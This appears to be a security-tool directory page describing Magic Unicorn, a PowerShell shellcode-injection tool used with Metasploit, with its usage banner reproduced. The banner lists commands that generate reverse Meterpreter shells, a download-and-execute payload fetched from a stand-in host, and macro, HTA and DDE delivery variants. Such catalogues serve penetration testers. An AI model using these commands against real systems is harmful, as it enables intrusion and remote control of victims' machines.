Magic Unicorn

LSE toolsLSE toolsMagic Unicorn (195)Magic Unicorn (195)

Tool and Usage

Project details

License
Custom license
Programming language
Python
Author
David Kennedy
Latest release
3.17
Latest release date

Project health

60
This score is calculated by different factors, like project age, last release date, etc.

Why this tool?

Magic Unicorn is a tool to perform a PowerShell downgrade attack and inject shellcode into memory.

How it works

The tool is used together with Metasploit. If Magic Unicorn is located within the right path, then execute the tool. Upon execution, a PowerShell command is generated that can be pasted in a command line window. Another option is to use a payload delivery system from within Metasploit.

Background information

Magic Unicorn is based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by our own David Kennedy and Josh Kelly at DEF CON 18.

Usage and audience

Magic Unicorn is commonly used for penetration testing or shellcode injection. Target users for this tool are pentesters and security professionals.

Features

  • Command line interface

Example usage and output

-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

Tool review and remarks

The review and analysis of this project resulted in the following remarks for this security tool:

Strengths

  • + More than 1000 GitHub stars
  • + Many releases available
  • + The source code of this software is available

History and highlights

  • Demo at DEF CON 26 Demo Labs

Author and Maintainers

Magic Unicorn is under development by David Kennedy.

Installation

Supported operating systems

Magic Unicorn is known to work on Linux.

This tool page was updated at . Found an improvement? Help the community by submitting an update.

Related tool information

Categories

This tool is categorized as a PowerShell exploitation tool.

Related topics